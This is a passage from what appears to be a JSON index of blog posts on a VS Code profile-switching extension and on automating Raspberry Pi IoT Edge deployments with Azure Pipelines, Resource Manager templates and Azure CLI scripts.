dishwasher.\nCombine this with battery storage (something on the plans to purchase) and you can predict whether to run off the battery during the day because the weather indicates you could recharge before the solar generation stops, and sell all generated energy back to the grid, maximising profits.\nAdmittedly, this one is going to be a harder sell to my wife, but I want to have stretch goals! 😉\nConclusion I really hope you’ve enjoyed following this series as much as I have enjoyed making it.\nI went into this project not knowing anything about IoT and planning on just running a console app on a Raspberry Pi and talking to an Azure Functions, but throughout the journey I got to explore into a bunch of the Azure IoT tooling and got to the point where I can now push a commit to GitHub and have it deployed to a Raspberry Pi within 20 minutes.\n", "id": "2019-08-02-home-grown-iot-whats-next" }, { "title": "VS Code Profile Switcher Extensions Support", "url": "https://www.aaron-powell.com/posts/2019-07-25-profile-switcher-extensions-support/", "date": "Thu, 25 Jul 2019 13:46:04 +1000", "tags": [ "vscode" ], "description": "Adding extension management to the VS Code Profile Switcher", "content": "I’ve just released some updates to my VS Code Profile Switcher extension which adds the feature that was most required when I first announced it, extension support!\nExtension Support When creating a profile you might want to have different extensions loaded, say you’re doing some React work, maybe you don’t want the Vue extensions loaded, the more extensions you have installed, the more that VS Code has to activate, all of which takes time.\nNow when you save a profile (either new or overriding an existing) the extension will look at all the extensions that you have and add them to your extensions profile. Then when you next load that profile the extension will look at what extensions are loaded in VS Code, compare that to the list of extensions that the profile says you should have, and installs the missing ones while removing the excess ones.\nThis is slightly different to the way settings are handled, settings are addative, meaning that any settings a profile has will be merged over the top of existing settings, but this didn’t seem right for extensions.\nPerformance Considerations I’ll often flick between a number of profiles so I wanted to ensure that it performs decently. To this end when a profile removes an extension it moves it to globalStorage and then when it’s needed again it’ll copy it back in. If the extension doesn’t exist in globalStorage it will then install it from the marketplace. Installing from the marketplace does take time, and if you’ve got a lot of extensions that need to come from there it’ll take longer, but that shouldn’t happen too frequently.\nIgnoring Extensions There may be extensions that you always want installed, your preferred themes for example. There are also some extensions that the removal of can be problematic or they are quite large, such as Live Share.\nYou don’t really want to make sure they are in every single profile, so instead I’ve added a setting called profileSwitcher.extensionsIgnore. This is an array of extension ID’s that you want to be in every profile and by default I have these set to be ignored:\nshan.code-settings-sync ms-vsliveshare.vsliveshare ms-vsliveshare.vsliveshare-audio ms-vsliveshare.vsliveshare-pack If you want to add more you’ll need to edit your settings.json file and add the setting. If you do manually set the setting you’ll need include those 4 above (assuming you want to keep ignoring them), as that’s the default until manually set.\nNote on Upgrading Just a quick note when upgrading to the latest release, if you saved a profile prior to 0.3.0 it will have no extensions associated with it, so you’ll want to resave that profile, otherwise when you switch it’ll think you don’t have any associated extensions in the profile and remove all of yours (see bug #6).\nWrap Up I was really happy to get this feature landed because nearly everyone asked me about it when I first released it! It was a little tricky, VS Code doesn’t really provide an API for doing this kind of stuff with extensions (can’t blame them, you don’t want to make it easy for extensions to manipulate other extensions!) but it seems to be working well now in the 0.3.3 release.\nIf you are using the extension I’d love to hear about it, know the kinds of things it’s helping you with and what features you’d like to see in the future.\n", "id": "2019-07-25-profile-switcher-extensions-support" }, { "title": "Home Grown IoT - Automated DevOps", "url": "https://www.aaron-powell.com/posts/2019-07-22-home-grown-iot-automated-devops/", "date": "Tue, 23 Jul 2019 10:43:14 +1000", "tags": [ "fsharp", "iot", "devops" ], "description": "Moving from manual DevOps to automated DevOps", "content": "Having had a look at some tools for deploying IoT applications there was one piece of the puzzle that was missing, automation. After all, one of my goals is to be able to deploy updates to my project without really any effort, I want the idea of doing a git push and then it just deploying.\nAnd that brings us to this post, a look at how we can do automated deployments of IoT projects using IoT Edge and Azure Pipelines.\nBefore we dive in, it’s worth noting that the IoT Edge team have guidance on how to do this on Microsoft Docs already, but it’ll generate you a sample project, which means you’d need to retrofit your project into it. That is what we’ll cover in this post, so I’d advise you to have a skim of the documentation first.\nDefining Our Process As we get started we should look at the process that we’ll go through to build and deploy the project. I’m going to split this into clearly defined Build and Release phases using the YAML Azure Pipelines component for building and then the GUI-based Release for deploying to the Pi. The primary reason I’m going down this route is, at the time of writing, the YAML Releases preview announced at //Build doesn’t support approvals, which is something I want (I’ll explain why later in this post).\nBuild Phase Within the Build phase our pipeline is going to be responsible for compiling the application, generating the IoT Edge deployment templates and creating the Docker images for IoT Edge to use.\nI also decided that I wanted to have this phase responsible for preparing some of the Azure infrastructure that I would need using Resource Manager Templates. The goal here was to be able to provision everything 100% from scratch using the pipeline, and so that you, dear reader, could see exactly what is being used.\nRelease Phase The Release phase will be triggered by a successful Build phase completion and responsible for creating the IoT Edge deployment and for deploying my Azure Functions to process the data as it comes in.\nTo do this I created separate “environments” for the Pi and Azure Functions, since I may deploy one and not the other, and also run these in parallel.\nGetting The Build On Let’s take a look at what is required to build the application ready for release. Since I’m using the YAML schema I’ll start with the triggers and variables needed:\n1 2 3 4 5 6 7 8 9 10 11 12 trigger: - master pr: none variables: azureSubscription: 'Sunshine Service Connection' azureResourceNamePrefix: sunshine buildConfiguration: 'Release' azureResourceLocation: 'Australia East' jobs: I only care about the master branch, so I’m only triggering code on that branch itself and I’m turning off pull request builds, since I don’t want to automatically build and release PR’s (hey, this is my house! 😝). There are a few variables we’ll need, mainly related to the Azure resources that we’ll generate, so let’s define them rather than having magic strings around the place.\nOptimising Builds with Jobs When it comes to running builds in Azure Pipelines it’s important to think about how to do this efficiently. Normally we’ll create a build definition which is a series of sequential tasks that are executed, we compile, package, prepare environments, etc. but this isn’t always the most efficient approach to our build. After all, we want results from our build as fast as we can.\nTo do this we can use Jobs in Azure Pipelines. A Job is a collection of steps to be undertaken to complete part of our pipeline, and the really nice thing about Jobs is that you can run them in parallel (depending on your licensing, I’ve made my pipeline public meaning I get 10 parallel jobs) and with a pipeline that generates a lot of Docker images, being able to do them in parallel is a great time saver!\nAlso, with different Jobs you can specify different agent pools, so you can run some of your pipeline on Linux and some of it on Windows. You can even define dependencies between Jobs so that you don’t try and push a Docker image to a container registry before the registry has been created.\nWith all of this in mind, it’s time to start creating our pipeline.\nBuilding the Application What’s the simplest thing we need to do in our pipeline? Compile our .NET code, so let’s start there:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 - job: Build pool: vmImage: "Ubuntu-16.04" steps: - script: dotnet build --configuration $(buildConfiguration) displayName: "dotnet build $(buildConfiguration)" - task: DotNetCoreCLI@2 inputs: command: "publish" arguments: "--configuration $(BuildConfiguration)" publishWebProjects: false zipAfterPublish: false displayName: dotnet publish - task: ArchiveFiles@2 inputs: rootFolderOrFile: "$(Build.SourcesDirectory)/src/Sunshine.Downloader/bin/$(BuildConfiguration)/netcoreapp2.2/publish" includeRootFolder: false archiveFile: "$(Build.ArtifactStagingDirectory)/Sunshine.Downloader-$(Build.BuildId).zip" displayName: Archive Downloader - task: ArchiveFiles@2 inputs: rootFolderOrFile: "$(Build.SourcesDirectory)/src/Sunshine.Functions/bin/$(BuildConfiguration)/netcoreapp2.1/publish" includeRootFolder: false archiveFile: "$(Build.ArtifactStagingDirectory)/Sunshine.Functions-$(Build.BuildId).zip" displayName: Archive Functions - task: ArchiveFiles@2 inputs: rootFolderOrFile: "$(Build.SourcesDirectory)/src/Sunshine.MockApi/bin/$(BuildConfiguration)/netcoreapp2.2/publish" includeRootFolder: false archiveFile: "$(Build.ArtifactStagingDirectory)/Sunshine.MockApi-$(Build.BuildId).zip" displayName: Archive MockApi - task: PublishBuildArtifacts@1 displayName: "Publish Artifact" continueOnError: true inputs: artifactName: Apps The Build job is your standard .NET Core pipeline template, we run the dotnet build using the configuration we define in the variables (defaulted to Release), then do a dotnet publish to generate the deployable bundle and then zip each project as artifacts for the pipeline. The reason I publish all the projects as artifacts, even though the IoT component will be Dockerised, is so I can download and inspect the package in the future if I want to.\nOnto creating our IoT Edge deployment packages.\nBuild IoT Edge Deployment Packages To create the IoT Edge deployment packages we need to do three things, create the Docker image, push it to a container registry and create our deployment template (which we looked at in the last post).\nCreating a Container Registry But this means we’ll need a container registry to push to. I’m going to use Azure Container Registry (ACR) as it integrates easily from a security standpoint across my pipeline and IoT Hub, but you can use any registry you wish. And since I’m using ACR I need it to exist. You could do this by clicking through the portal, but instead, I want this scripted and part of my git repo so I could rebuild if needed, and for that, we’ll use a Resource Manager template:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 { "resources": [ { "type": "Microsoft.ContainerRegistry/registries", "sku": { "name": "[parameters('registrySku')]" }, "name": "[variables('registryName')]", "apiVersion": "2017-10-01", "location": "[parameters('location')]", "properties": { "adminUserEnabled": false } } ], "parameters": { "name": { "type": "string", "metadata": { "description": "Short name for the resources within this stack" } }, "location": { "type": "string" }, "registrySku": { "defaultValue": "Standard", "type": "string", "metadata": { "description": "The SKU of the container registry." } } }, "variables": { "registryName": "[concat(parameters('name'), 'cr')]" }, "outputs": { "acrUrl": { "type": "string", "value": "[concat(variables('registryName'), '.azurecr.io')]" }, "acrName": { "type": "string", "value": "[variables('registryName')]" }, "subscriptionId": { "type": "string", "value": "[subscription().id]" } }, "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", "contentVersion": "1.0.0.0" } Which we can run from the pipeline with this task:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 - job: PrepareAzureACR displayName: Prepare Azure ACR pool: vmImage: "Ubuntu-16.04" steps: - task: AzureResourceGroupDeployment@2 displayName: "Azure Deployment:Create ACR" inputs: azureSubscription: "$(azureSubscription)" resourceGroupName: "$(azureResourceNamePrefix)-shared" location: "$(azureResourceLocation)" templateLocation: Linked artifact csmFile: "$(Build.SourcesDirectory)/.build/acr.json" overrideParameters: '-name $(azureResourceNamePrefix) -registrySku "Basic" -location "$(azureResourceLocation)"' deploymentOutputs: ResourceGroupDeploymentOutputs Notice here I’m using the variables defined early on for the -name and -location parameters. This helps me have consistency naming of resources. I’m also putting this into a resource group called $(azureResourceNamePrefix)-shared because if I wanted to have the images used in both production and non-production scenario (which I could be doing if I had more than just my house that I was building against). The last piece to note in the task is that the templateLocation is set to Linked artifact, which tells the task that the file exists on disk at the location defined in csmFile, rather than pulling it from a URL. This caught me out for a while, so remember, if you want to keep your Resource Manager templates in source control and use the version in the clone, set the templateLocation to Linked artifact and set a csmFile path.\nWhen it comes to creating the IoT Edge deployment template I’m going to need some information about the registry that’s just been created, I’ll need the name of the registry and the URL of it. To get those I’ve created some output variables from the template:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... "outputs": { "acrUrl": { "type": "string", "value": "[concat(variables('registryName'), '.azurecr.io')]" }, "acrName": { "type": "string", "value": "[variables('registryName')]" }, "subscriptionId": { "type": "string", "value": "[subscription().id]" } }, ... But how do we use those? Well initially the task will dump them out as a JSON string in a variable, defined using deploymentOutputs: ResourceGroupDeploymentOutputs, but now we need to unpack that and set the variables we’ll use in other tasks. I do this with a PowerShell script:\n1 2 3 4 5 6 7 8 9 10 11 param ( [Parameter(Mandatory=$true)] [string] $ResourceManagerOutput ) $json = ConvertFrom-Json $ResourceManagerOutput Write-Host "##vso[task.setvariable variable=CONTAINER_REGISTRY_SERVER;isOutput=true]$($json.acrUrl.value)" Write-Host "##vso[task.setvariable variable=CONTAINER_REGISTRY_SERVER_NAME;isOutput=true]$($json.acrName.value)" Write-Host "##vso[task.setvariable variable=SUBSCRIPTION_ID;isOutput=true]$($json.subscriptionID.value)" Executed with a task:\n1 2 3 4 5 6 7 - task: PowerShell@2 displayName: Convert ARM output to environment variables name: armVar inputs: targetType: filePath filePath: '$(Build.SourcesDirectory)/.build/Set-BuildResourceManagerOutput.ps1' arguments: -ResourceManagerOutput '$(ResourceGroupDeploymentOutputs)' Now in other tasks I can access CONTAINER_REGISTRY_SERVER as a variable.\nPreparing the IoT Edge Deployment I want to create three Docker images, the ARM32 image which will be deployed to the Raspberry Pi, but also an x64 image for local testing and an x64 image with the debugger components. And this is where our use of Jobs will be highly beneficial, from my testing each of these takes at least 7 minutes to run, so running them in parallel drastically reduces our build time.\nTo generate the three images I need to execute the same set of tasks three times, so to simplify that process we can use Step Templates (side note, this is where I came across the issue I described here on templates and parameters).\n1 2 3 4 5 6 7 8 9 parameters: name: "" ARTIFACT_STORAGE_NAME: "" CONTAINER_REGISTRY_SERVER: "" SUBSCRIPTION_ID: "" CONTAINER_REGISTRY_SERVER_NAME: "" defaultPlatform: "" azureResourceNamePrefix: "" azureSubscription: "" We’ll need a number of bits of information for the tasks within our template, so we’ll start by defining a bunch of parameters. Next, let’s define the Job:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 jobs: - job: ${{ parameters.name }} displayName: Build Images for IoT Edge (${{ parameters.defaultPlatform }}) dependsOn: - PrepareArtifactStorage - PrepareAzureACR - Build pool: vmImage: 'Ubuntu-16.04' variables: CONTAINER_REGISTRY_SERVER: ${{ parameters.CONTAINER_REGISTRY_SERVER }} SUBSCRIPTION_ID: ${{ parameters.SUBSCRIPTION_ID }} CONTAINER_REGISTRY_SERVER_NAME: ${{ parameters.CONTAINER_REGISTRY_SERVER_NAME }} ARTIFACT_STORAGE_NAME: ${{ parameters.ARTIFACT_STORAGE_NAME }} steps: To access a template parameter you need to use ${{ parameters.<parameter name> }}. I’m providing the template with a unique name in the name parameter and then creating a display name using the architecture (AMD64, ARM32, etc.).\nNext, the Job defines a few dependencies, the Build and PrepareAzureACR Jobs we’ve seen above and I’ll touch on the PrepareArtifactStorage shortly. Finally, this sets the pool as a Linux VM and converts some parameters to environment variables in the Job.\nLet’s start looking at the tasks:\n1 2 3 4 5 6 7 8 9 10 11 - task: DownloadBuildArtifacts@0 displayName: "Download Build Artifacts" inputs: artifactName: Apps downloadPath: $(System.DefaultWorkingDirectory) - task: ExtractFiles@1 displayName: Unpack Build Artifact inputs: destinationFolder: "$(Build.SourcesDirectory)/src/Sunshine.Downloader/bin/$(BuildConfiguration)/netcoreapp2.2/publish" archiveFilePatterns: $(System.DefaultWorkingDirectory)/Apps/Sunshine.Downloader-$(Build.BuildId).zip Since the Job that’s running here isn’t on the same agent that did the original build of our .NET application we need to get the files, thankfully we published them as an artifact so it’s just a matter of downloading it and unpacking it into the right location. I’m unpacking it back to where the publish originally happened, because the Job does do a git clone initially (I need that to get the module.json and deployment.template.json for IoT Edge) I may as well pretend as I am using the normal structure.\nCode? ✔. Deployment JSON? ✔. Time to use the IoT Edge tools to create some deployment files. Thankfully, there’s an IoT Edge task for Azure Pipelines, and that will do nicely.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 - task: AzureIoTEdge@2 displayName: Azure IoT Edge - Build module images (${{ parameters.defaultPlatform }}) inputs: templateFilePath: "$(Build.SourcesDirectory)/.build/deployment.template.json" defaultPlatform: ${{ parameters.defaultPlatform }} - task: AzureIoTEdge@2 displayName: Azure IoT Edge - Push module images (${{ parameters.defaultPlatform }}) inputs: action: "Push module images" templateFilePath: "$(Build.SourcesDirectory)/.build/deployment.template.json" azureSubscriptionEndpoint: ${{ parameters.azureSubscription }} azureContainerRegistry: '{"loginServer":"$(CONTAINER_REGISTRY_SERVER)", "id" : "$(SUBSCRIPTION_ID)/resourceGroups/${{ parameters.azureResourceNamePrefix }}-shared/providers/Microsoft.ContainerRegistry/registries/$(CONTAINER_REGISTRY_SERVER_NAME)"}' defaultPlatform: ${{ parameters.defaultPlatform }} The first task will use the deployment.template.json file to build the Docker image for the platform that we’ve specified. As I noted in the last post if you’ll need to have the CONTAINER_REGISTRY_USERNAME, CONTAINER_REGISTRY_PASSWORD and CONTAINER_REGISTRY_SERVER environment variables set so they can be substituted into the template. We get CONTAINER_REGISTRY_SERVER from the parameters passed in (unpacked as a variable) but what about the other two? They are provided by the integration between Azure and Azure Pipelines, so you don’t need to set them explicitly.\nOnce the image is built we execute the Push module images command on the task which will push the image to our container registry. Since I’m using ACR I need to provide a JSON object which contains the URL for the ACR and the id for it. The id is a little tricky, you need to generate the full resource identifier which means you need to join each segment together, resulting in this $(SUBSCRIPTION_ID)/resourceGroups/${{ parameters.azureResourceNamePrefix }}-shared/providers/Microsoft.ContainerRegistry/registries/$(CONTAINER_REGISTRY_SERVER_NAME) which would become <some guid>/resourceGroups/sunshine-shared/providers/Microsoft.ContainerRegistry/registries/sunshinecr.\nFinally, we need to publish our deployment.platform.json file that the Release phase will execute to deploy a release to a device, but there’s something to be careful about here. When the deployment is generated the container registry information is replaced with the credentials needed to talk to the registry. This is so the deployment, when pulled to the device, is able to log into your registry. But there’s a downside to this, you have your credentials stored in a file that needs to be attached to the build. The standard template generated in the docs will attach this as a build artifact, just like our compiled application, and this works really well for most scenarios. There is a downside to this though, anyone who has access to your build artifacts will have access to your container registry credentials, which is something that you may not want. This bit me when I realised that, because my pipeline is public, everyone had access to my container registry credentials! I then quickly deleted that ACR as the credentials were now compromised! 🤦‍♂️\nSecuring Deployments We want to secure the deployment so that our build server isn’t a vector into our infrastructure and that means that we can’t attach the deployment files as build artifacts.\nThis is where the other dependency on this Job, PrepareArtifactStorage, comes in. Instead of pushing the deployment file as an artifact I push it to an Azure storage account:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 - job: PrepareArtifactStorage displayName: Setup Artifact Storage Azure Resources pool: vmImage: "Ubuntu-16.04" steps: - task: AzureResourceGroupDeployment@2 displayName: "Azure Deployment: Artifact Storage" inputs: azureSubscription: "$(azureSubscription)" resourceGroupName: "$(azureResourceNamePrefix)-shared" location: "$(azureResourceLocation)" templateLocation: Linked artifact csmFile: "$(Build.SourcesDirectory)/.build/artifact-storage.json" overrideParameters: '-name $(azureResourceNamePrefix) -location "$(azureResourceLocation)"' deploymentOutputs: ResourceGroupDeploymentOutputs - task: PowerShell@2 displayName: Convert ARM output to environment variables name: artifactVars inputs: targetType: filePath filePath: "$(Build.SourcesDirectory)/.build/Set-ArtifactStorageResourceManagerOutput.ps1" arguments: -ResourceManagerOutput '$(ResourceGroupDeploymentOutputs)' This uses a Resource Manager template that just creates the storage account:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 { "resources": [ { "apiVersion": "2015-06-15", "type": "Microsoft.Storage/storageAccounts", "name": "[variables('artifactStorageName')]", "location": "[parameters('location')]", "properties": { "accountType": "Standard_LRS" } } ], "parameters": { "name": { "type": "string", "metadata": { "description": "Name prefix for the resources to be created" } }, "location": { "type": "string", "metadata": { "description": "Azure Region for each resource to be created in" } } }, "variables": { "artifactStorageName": "[replace(concat(parameters('name'), 'artifacts'), '-', '')]" }, "outputs": { "artifactStorageName": { "type": "string", "value": "[variables('artifactStorageName')]" } }, "$schema": "http://schema.management.azure.com/schemas/2014-04-01-preview/deploymentTemplate.json#", "contentVersion": "1.0.0.0" } And a PowerShell script to get the outputs into variables:\n1 2 3 4 5 6 7 8 9 param ( [Parameter(Mandatory=$true)] [string] $ResourceManagerOutput ) $json = ConvertFrom-Json $ResourceManagerOutput Write-Host "##vso[task.setvariable variable=ARTIFACT_STORAGE_NAME;isOutput=true]$($json.artifactStorageName.value)" Pushing Artifacts to Storage Now we can complete our IoT Job by using the storage account as the destination for the artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 - task: AzureCLI@1 displayName: Upload deployment artifact inputs: azureSubscription: ${{ parameters.azureSubscription }} scriptLocation: inlineScript arguments: $(ARTIFACT_STORAGE_NAME) $(Build.ArtifactStagingDirectory) ${{ parameters.defaultPlatform }} $(Build.BuildId) inlineScript: | account_name=$1 key=$(az storage account keys list --account-name $account_name | jq '.[0].value') exists=$(az storage container exists --account-name $account_name --name artifacts --account-key $key | jq '.exists') if [ "$exists" == false ]; then az storage container create --name artifacts --account-name $account_name --account-key $key fi az storage blob upload --container-name artifacts --file $2/deployment.$3.json --name $4/deployment.$3.json --account-name $account_name --account-key $key I’m using the Azure CLI rather than AzCopy because I’m running on a Linux agent. It executes a script that will get the account key from the storage account (so I can write to it), checks if there is a container (script everything, don’t assume!) and then uploads the file into a folder in the storage container that prefixes with the Build.BuildId so I know which artifact to use in the release phase.\nUsing The Template The template that I’ve defined for the IoT Job is in a separate file called template.iot-edge.yml, and we’ll need to execute that from our main azure-pipelines.yml file:\n1 2 3 4 5 6 7 8 9 10 - template: .build/template.iot-edge.yml parameters: name: BuildImages_arm32v7 CONTAINER_REGISTRY_SERVER: $[dependencies.PrepareAzureACR.outputs['armVar.CONTAINER_REGISTRY_SERVER']] SUBSCRIPTION_ID: $[dependencies.PrepareAzureACR.outputs['armVar.SUBSCRIPTION_ID']] CONTAINER_REGISTRY_SERVER_NAME: $[dependencies.PrepareAzureACR.outputs['armVar.CONTAINER_REGISTRY_SERVER_NAME']] ARTIFACT_STORAGE_NAME: $[dependencies.PrepareArtifactStorage.outputs['artifactVars.ARTIFACT_STORAGE_NAME']] defaultPlatform: arm32v7 azureResourceNamePrefix: $(azureResourceNamePrefix) azureSubscription: $(azureSubscription) We’re relying on the outputs from a few other Jobs, and to access those we use $[dependencies.JobName.outputs['taskName.VARIABLE_NAME']], and then they are passed into the template for usage (remember to assign them to template variables or they won’t unpack).\nCreating Our Azure Environment There’s only one thing left to do in the build phase, prepare the Azure environment that we’ll need. Again we’ll use a Resource Manager template to do that, but I won’t embed it in the blog post as it’s over 400 lines, instead, you can find it here.\nWhen creating the IoT Hub resource with the template you can provision the routing like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ... "routing": { "endpoints": { "serviceBusQueues": [], "serviceBusTopics": [], "eventHubs": [{ "connectionString": "[listKeys(resourceId('Microsoft.EventHub/namespaces/eventhubs/authorizationRules', variables('EventHubsName'), 'live-list', variables('IotHubName')), '2017-04-01').primaryConnectionString]", "name": "sunshine-live-list-eh", "subscriptionId": "[subscription().subscriptionId]", "resourceGroup": "[resourceGroup().name]" }, ... ], "storageContainers": [] }, "routes": [{ "name": "live-list", "source": "DeviceMessages", "condition": "__messageType='liveList'", "endpointNames": [ "sunshine-live-list-eh" ], "isEnabled": true }, ... We can even build up the connection string to Event Hub authorization rules using the listKeys function combined with resourceId. A note with using resourceId, when you’re joining the segments together you don’t need the / separator except for the resource type, which is a bit confusing when you create a resource name like "name": "[concat(variables('EventHubsName'), '/live-list/', variables('IotHubName'))]", which does contain the /.\nA new Job is created for this template:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 - job: PrepareAzureIoTEnvrionment displayName: Prepare Azure IoT Environment pool: vmImage: "Ubuntu-16.04" variables: resourceGroupName: sunshine-prod steps: - task: AzureResourceGroupDeployment@2 displayName: "Azure Deployment:Create Or Update Resource Group action on sunshine-prod" inputs: azureSubscription: "$(azureSubscription)" resourceGroupName: "$(azureResourceNamePrefix)-prod" location: "$(azureResourceLocation)" templateLocation: Linked artifact csmFile: "$(System.DefaultWorkingDirectory)/.build/azure-environment.json" overrideParameters: '-name $(azureResourceNamePrefix) -location "$(azureResourceLocation)"' deploymentOutputs: ResourceGroupDeploymentOutputs And now you might be wondering “Why is the step to create the production environment in Azure done in a Build phase, not Release phase?”, which is a pretty valid question to ask, after all, if I did have multiple environments, why wouldn’t I do the Azure setup as part of the release to that environment?\nWell, the primary reason I took this approach is that I wanted to avoid having to push the Resource Manager template from the Build to Release phase. Since the Build phase does the git clone and the Release phase does not I would have had to attach the template as an artifact. Additionally, I want to use some of the variables in both phases, but you can’t share variables between Build and Release, which does still pose a problem with the environment setup, I need the name of the Azure Functions and IoT Hub resources.\nTo get those I write the output of the Resource Manager deployment to a file that is attached as an artifact:\n1 2 3 4 5 6 7 8 9 10 11 - task: PowerShell@2 displayName: Publish ARM outputs for asset inputs: targetType: filePath filePath: "$(Build.SourcesDirectory)/.build/Set-ReleaseResourceManagerOutput.ps1" arguments: -ResourceManagerOutput '$(ResourceGroupDeploymentOutputs)' - task: PublishBuildArtifacts@1 displayName: "Publish Artifact" continueOnError: true inputs: artifactName: arm Using this PowerShell script:\n1 2 3 4 5 6 7 param ( [Parameter(Mandatory=$true)] [string] $ResourceManagerOutput ) Set-Content -Path $env:BUILD_ARTIFACTSTAGINGDIRECTORY/release-output.json -Value $ResourceManagerOutput 🎉 Build phase completed! You can find the complete Azure Pipeline YAML file in GitHub.\nDeploying Releases Here’s the design of our Release process that we’re going to go ahead and create using the Azure Pipelines UI:\nOn the left is the artifacts that will be available to the Release, it’s linked to the Build pipeline we just created and it’s set to automatically run when a build completes successfully.\nI’ve defined three Stages, which represent groups of tasks I will run. I like to think of Stages like environments, so I have an environment for my Raspberry Pi and an environment for my Azure Functions (I do have a 2nd Raspberry Pi environment, but that’s my test device that lives in the office, and I just use to smoke test IoT Edge, generally it’s not even turned on).\nPi Stage Let’s have a look at the stage for deploying to a Raspberry Pi, or really, any IoT device supported by IoT Edge:\nThe first task is to get our deployment template. Because I’m using an Azure storage account to store this I use the Azure CLI to download the file, but if you’re using it as an artifact from the build output, you’d probably skip that step (since artifacts are automatically downloaded).\nWith the deployment downloaded it’s time to talk to Azure IoT Hub!\nProvisioning the Device Continuing on our approach to assume nothing exists we’ll run a task that checks for the device identity in IoT Hub and if it doesn’t exist, create it.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 #! /bin/sh IoTHubName=$(cat $SYSTEM_DEFAULTWORKINGDIRECTORY/_aaronpowell.sunshine/arm/release-output.json | jq '.iotHubName.value' | sed s/\\"// | sed s/\\"//) # install iot hub extension az extension add --name azure-cli-iot-ext # check if device exists # note: redirect to /dev/null so the keys aren't printed to logs, and we don't need the output anyway az iot hub device-identity show \\ --device-id $DEVICE_ID \\ --hub-name $IoTHubName >> /dev/null if [ $? -ne 0 ]; then az iot hub device-identity create --hub-name $IoTHubName --device-id $DEVICE_ID --edge-enabled TMP_OUTPUT="$(az iot hub device-identity show-connection-string --device-id $DEVICE_ID --hub-name $IoTHubName)" RE="\\"cs\\":\\s?\\"(.*)\\"" if [[ $TMP_OUTPUT =~ $RE ]]; then CS_OUTPUT=${BASH_REMATCH[1]}; fi echo "##vso[task.setvariable variable=CS_OUTPUT]${CS_OUTPUT}" fi It’s a little bit hacked my shell script skills are not that great! 🤣\nWe’ll need the name of the IoT Hub that was created using Resource Manager in the build phase, which we can pull using jq. After that install the IoT Hub CLI extension, since the commands we’ll need don’t ship in the box.\nThe command that’s of interest to us is az iot hub device-identity show which will get the device identity information or return a non-zero exit code if the device doesn’t exist. Since the default of the command is to write to standard out and the output contains the device keys, we’ll redirect that to /dev/null as I don’t actually need the output, I just need the exit code. If you do need the output then I’d assign it to a variable instead.\nIf the device doesn’t exist (non-zero exit code, tested with if [ $? -ne 0 ]) you can use az iot hub device-identity create. Be sure to pass --edge-enabled so that the device can be connected with IoT Edge!\nThe last thing the script will do is export the connection string if the connection string can be retrieved (not 100% sure on the need for this, it was just in the template!).\nPreparing the Module Twin In my post about the data downloader I mentioned that I would use module twins to get the credentials for my solar inverter API, rather than embedding them.\nTo get those into the module twin we’ll use the Azure CLI again:\n1 2 3 4 5 6 7 8 9 10 11 #! /bin/sh az extension add --name azure-cli-iot-ex IoTHubName=$(cat $SYSTEM_DEFAULTWORKINGDIRECTORY/_aaronpowell.sunshine/arm/release-output.json | jq '.iotHubName.value' | sed s/\\"//g) az iot hub module-twin update \\ --device-id $DEVICE_ID \\ --hub-name $IoTHubName \\ --module-id SunshineDownloader \\ --set properties.desired="{ \\"inverter\\": { \\"username\\": \\"$SUNSHINEUSER\\", \\"password\\": \\"$SUNSHINEPWD\\", \\"url\\": \\"$SUNSHINEURL\\" } }" >> /dev/null Using the az iot hub module-twin update command we can set the properties.desired section of the twin (this just happens to be where I put them, but you can create your own nodes in the twin properties). Like the last task the output is redirected to /dev/null so that the updated twin definition, which is returned, doesn’t get written to our log file. After all, our secrets wouldn’t be secret if they are dumped to logs!\nIt’s Time to Deploy Finally it’s time to send our deployment to IoT Edge! We’ll use the IoT Edge task again, but this time the action will be Deploy to IoT Edge devices:\nWe specify the deployment template that we’ll execute (the one we got from storage) and it’s going to be a Single Device deployment (if you were deploying to a fleet of devices then you’d change that and specify some way to find the group of devices to target). Under the hood, this task will execute the iotedgedev tool with the right commands and will result in our deployment going to IoT Edge and eventually our device! 🎉\nDeploying Functions With our stage defined for IoT devices it’s time for the Azure Functions. As it turns out, Azure Pipelines is really good at doing this kind of deployment, there’s a task that we can use and all we need to do is provide it with the ZIP that contains the functions (which comes from our artifacts).\nThere’s no need to provide the connection strings, that was set up in the Resource Manager template!\n🎉 Release phase complete!\nConclusion Phew, that was a long post, but we’ve covered a lot! Our deployment has run end-to-end, from a git push that triggers the build to creating an Azure environment, compiling our application to building Docker images, setting up devices in IoT Hub and eventually deploying to them.\nI’ve made the Azure Pipeline I use public so you can have a look at what it does, you’ll find the Build phase here and the Release phase here.\nAs I said at the start, I’d encourage you to have a read of the information on Microsoft Docs to get an overview of what the process would be and then use this article as a way to supplement how everything works.\nHappy DevOps’ing!\n", "id": "2019-07-22-home-grown-iot-automated-devops" }, { "title": "Home Grown IoT - Simple DevOps", "url": "https://www.aaron-powell.com/posts/2019-07-16-home-grown-iot-devops/", "date": "Tue, 16 Jul 2019 11:15:32 +1000", "tags": [ "fsharp", "iot", "devops" ], "description": "It's time to rub some DevOps on IoT", "content": "The app is build and our data can be processed, all that is left is to get everything deployed, and guess what the topic of this post will be!\nWhen it comes to CI/CD (Continuous Integration/Continuous Deployment) for IoT projects it can feel a bit daunting, you’ve got this tiny little computer that you’re trying to get stuff onto, it’s not just “the cloud” that you’re targetting. And these devices are not like normal computers, they have weird chipsets like ARM32!\nDeploying to a Raspberry Pi We need to work out how to get our 